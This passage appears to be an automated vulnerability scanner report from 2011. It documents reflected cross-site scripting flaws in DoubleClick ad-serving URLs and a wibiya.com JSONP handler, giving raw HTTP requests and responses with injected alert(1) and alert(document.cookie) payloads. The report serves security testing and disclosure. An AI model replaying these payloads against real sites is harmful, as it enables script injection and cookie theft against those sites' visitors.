document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f2c'-alert(1)-'a56d4b9fc45 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457e7'-alert(1)-'caf99647365 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18bf3"-alert(1)-"7264eb482c2 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1262"-alert(1)-"37bb6a46aea was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy% ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3514'-alert(1)-'36e03f38f43 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy% ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43731"-alert(1)-"187433e4b2d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:44:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... escape("http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff622'-alert(1)-'d54c1daec2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:44:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... href=\"http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu ...[SNIP]...
The value of the mfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54760'-alert(1)-'16463c601ed was submitted in the mfg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_54760'-alert(1)-'16463c601ed HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 05 Feb 2011 22:27:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 368
4.16. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/oiq.man.homeappliance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e06e3'-alert(1)-'618b2b40360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_&e06e3'-alert(1)-'618b2b40360=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 05 Feb 2011 22:26:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 363
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19620'-alert(1)-'d06efb22ec was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_19620'-alert(1)-'d06efb22ec HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 05 Feb 2011 22:25:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 359
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 270ed<script>alert(1)</script>529ef0f2bb5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Handlers/newsticker.php?callback=jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5&url=http%3A//www.kledy.de/rss_dts.php HTTP/1.1 Host: appcdn.wibiya.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1286380163-1295459907704
Response
HTTP/1.1 200 OK Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 23:08:34 GMT Expires: Sun, 06 Feb 2011 00:08:34 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch Vary: Accept-Encoding X-Powered-By: PHP/5.2.6-3ubuntu4.4 Content-Length: 51609
jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5({"name":"Kledy.de | Aktuelle News","posts":[{"title":"Lottozahlen vom Samstag (05.02.2011)","description":" In der Samstags-Ausspielung von "6 aus 49" des Deutschen Lotto- und Totoblocks wurde ...[SNIP]...
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 115a8<script>alert(1)</script>512fdd36cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
